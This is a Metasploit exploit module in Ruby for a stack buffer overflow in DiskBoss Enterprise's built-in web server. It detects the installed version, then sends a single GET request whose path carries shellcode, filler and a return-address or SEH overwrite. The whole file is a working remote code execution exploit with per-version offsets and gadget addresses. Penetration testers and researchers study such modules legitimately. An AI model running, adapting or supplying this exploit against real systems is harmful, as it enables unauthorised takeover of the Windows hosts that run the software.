##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
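class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Seh
  include Msf::Exploit::Remote::HttpClient

  # Product string present on the index page of every supported build. The
  # per-version target names extend it with the exact version, so the target
  # list is the single source of truth for fingerprinting (see match_target).
  PRODUCT_BANNER = 'DiskBoss Enterprise'.freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'DiskBoss Enterprise GET Buffer Overflow',
        'Description' => %q{
          This module exploits a stack-based buffer overflow vulnerability
          in the web interface of DiskBoss Enterprise v7.5.12, v7.4.28, and v8.2.14,
          caused by improper bounds checking of the request path in HTTP GET
          requests sent to the built-in web server. This module has been
          tested successfully on Windows XP SP3 and Windows 7 SP1.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'vportal', # Vulnerability discovery and PoC
          'Ahmad Mahfouz', # Vulnerability discovery and PoC
          'Gabor Seljan', # Metasploit module
          'Jacob Robles' # Metasploit module
        ],
        'References' => [
          ['CVE', '2025-34105'],
          ['EDB', '40869'],
          ['EDB', '42395']
        ],
        'DefaultOptions' => {
          # Exit only the hijacked thread so the DiskBoss service process is
          # not torn down when the payload finishes.
          'EXITFUNC' => 'thread'
        },
        'Platform' => 'win',
        'Payload' => {
          # The whole buffer travels as the GET request path, so NUL and the
          # whitespace/CR/LF bytes that would terminate or split the request
          # line must never appear in the encoded payload.
          'BadChars' => "\x00\x09\x0a\x0d\x20",
          'Space' => 2000
        },
        # Targets 1 and 2 overwrite the saved return address with a stack-pivot
        # gadget; target 3 overwrites an SEH record (see seh_request_path).
        # All return addresses live in libpal.dll and are only valid if that
        # DLL loads at its preferred base on the victim.
        'Targets' => [
          [
            'Automatic Targeting',
            {
              'auto' => true
            }
          ],
          [
            'DiskBoss Enterprise v7.4.28',
            {
              'Offset' => 2471,
              'Ret' => 0x1004605c # ADD ESP,0x68 # RETN [libpal.dll]
            }
          ],
          [
            'DiskBoss Enterprise v7.5.12',
            {
              'Offset' => 2471,
              'Ret' => 0x100461da # ADD ESP,0x68 # RETN [libpal.dll]
            }
          ],
          [
            'DiskBoss Enterprise v8.2.14',
            {
              'Offset' => 2496,
              'Ret' => 0x1002A8CA # SEH : # POP EDI # POP ESI # RET 04 [libpal.dll]
            }
          ]
        ],
        'Privileged' => true,
        'DisclosureDate' => '2016-12-05',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Fingerprints the web interface from its index page.
  #
  # Returns CheckCode::Vulnerable when the banner names one of the supported
  # versions, CheckCode::Detected when DiskBoss Enterprise is present in any
  # other version, CheckCode::Safe when the page does not mention the product,
  # and CheckCode::Unknown when no usable HTTP 200 response was obtained.
  def check
    body = fetch_index_body
    return Exploit::CheckCode::Unknown unless body

    return Exploit::CheckCode::Vulnerable if match_target(body)
    return Exploit::CheckCode::Detected if body.include?(PRODUCT_BANNER)

    Exploit::CheckCode::Safe
  end

  # Resolves the target (auto-detecting it from the index page when the
  # 'Automatic Targeting' target is selected), builds the overlong request
  # path for that target and sends it in a single GET request.
  #
  # Raises Failure::NoTarget when auto-detection finds no supported version or
  # the selected target has no request builder.
  def exploit
    mytarget = target

    if target['auto']
      print_status('Automatically detecting the target...')
      body = fetch_index_body
      mytarget = body ? match_target(body) : nil
      fail_with(Failure::NoTarget, 'No matching target') unless mytarget
      print_status("Selected Target: #{mytarget.name}")
    end

    sploit =
      case mytarget
      when targets[1], targets[2]
        pivot_request_path(mytarget)
      when targets[3]
        seh_request_path(mytarget)
      else
        fail_with(Failure::NoTarget, 'No matching target')
      end

    send_request_cgi(
      'method' => 'GET',
      'uri' => sploit
    )
  end

  private

  # GETs '/' on the web interface.
  #
  # Returns the response body as a String on HTTP 200, or nil (after a verbose
  # error naming the reason) when the request timed out or the server answered
  # with any other status. Shared by check and exploit so both fingerprint the
  # same way.
  def fetch_index_body
    res = send_request_cgi(
      'method' => 'GET',
      'uri' => '/'
    )

    if res.nil?
      vprint_error('Unable to determine due to a HTTP connection timeout')
      return nil
    end

    unless res.code == 200
      vprint_error("Unexpected HTTP status #{res.code} from the web interface")
      return nil
    end

    res.body.to_s
  end

  # Returns the first non-automatic target whose name (e.g.
  # 'DiskBoss Enterprise v7.4.28') appears verbatim in +body+, or nil.
  # Driving detection off the target names means adding a version is a
  # one-place change in the Targets list.
  def match_target(body)
    targets.reject { |t| t['auto'] }.find { |t| body.include?(t.name) }
  end

  # Request path for the v7.x targets (return-address overwrite).
  #
  # Layout: 21 NOPs, the encoded payload, alphabetic filler up to the target's
  # Offset, the 4-byte return address (little-endian) and 2500 bytes of
  # trailing filler. Alphabetic filler can never collide with the path
  # BadChars. Appending starts from the fresh NOP string, so the cached
  # encoded payload is never mutated.
  def pivot_request_path(t)
    path = make_nops(21)
    path << payload.encoded
    path << rand_text_alpha(t['Offset'] - payload.encoded.length)
    path << [t.ret].pack('V')
    path << rand_text_alpha(2500)
    path
  end

  # Request path for the v8.2.14 target (SEH overwrite).
  #
  # Layout: the encoded payload, alphabetic filler up to the target's Offset,
  # the SEH record (next-SEH short jump + handler address from the Seh mixin),
  # 10 NOPs, a 5-byte relative JMP back toward the shellcode, and filler to a
  # total of 5000 bytes.
  def seh_request_path(t)
    # dup: payload.encoded hands back the cached encoded payload object, and
    # appending to it in place would corrupt that cache.
    path = payload.encoded.dup
    path << rand_text_alpha(t['Offset'] - payload.encoded.length)
    path << generate_seh_record(t.ret)
    path << make_nops(10)
    # rel32 0xffffbf25 is a backwards jump; the distance was established by
    # the original PoC authors and cannot be derived from the layout above.
    path << Rex::Arch::X86.jmp(0xffffbf25) # JMP to ShellCode
    path << rand_text_alpha(5000 - path.length)
    path
  end
end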